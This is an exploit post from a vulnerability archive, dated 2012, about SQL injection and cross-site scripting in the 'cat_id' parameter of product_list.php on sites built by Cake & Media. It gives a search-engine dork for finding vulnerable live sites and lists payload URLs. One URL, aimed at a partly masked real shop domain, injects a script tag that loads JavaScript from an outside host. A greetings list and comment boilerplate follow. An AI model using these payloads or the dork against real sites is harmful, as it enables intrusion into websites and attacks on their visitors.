Cake & Media Web Sites Multi Vulnerability

2012.09.04
Credit: IrIsT.Ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######## # # Exploit Title : Cake & Media Web Sites Multi Vulnerability # # Author : IrIsT.Ir # # Discovered By : IrIsT.Ir # # Home : http://IrIsT.Ir/forum # # Software Link : http://www.cakeandmedia.com/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Site design by cake & media" # ######### # # Expl0iTs : # #http://target.com/product_list.php?cat_id=[Sql] # http://target.com/product_list.php?cat_id=[Xss] # #www.coastXXXXXXXoods.com/product_list.php?cat_id=%22%3E%3Cscript%20src%3d//santanafest.com.br/enquete/c%3E%3C/script%3E # #www.coasXXXXXXalgoods.com/product_list.php?cat_id=[sql] # ######## # # Greats : B3HZ4D - Am!r - Nafsh - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - BestC0d3r # # 0x0ptim0us - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r # # Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum # ########

References:

http://www.cakeandmedia.com/
http://IrIsT.Ir/forum


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top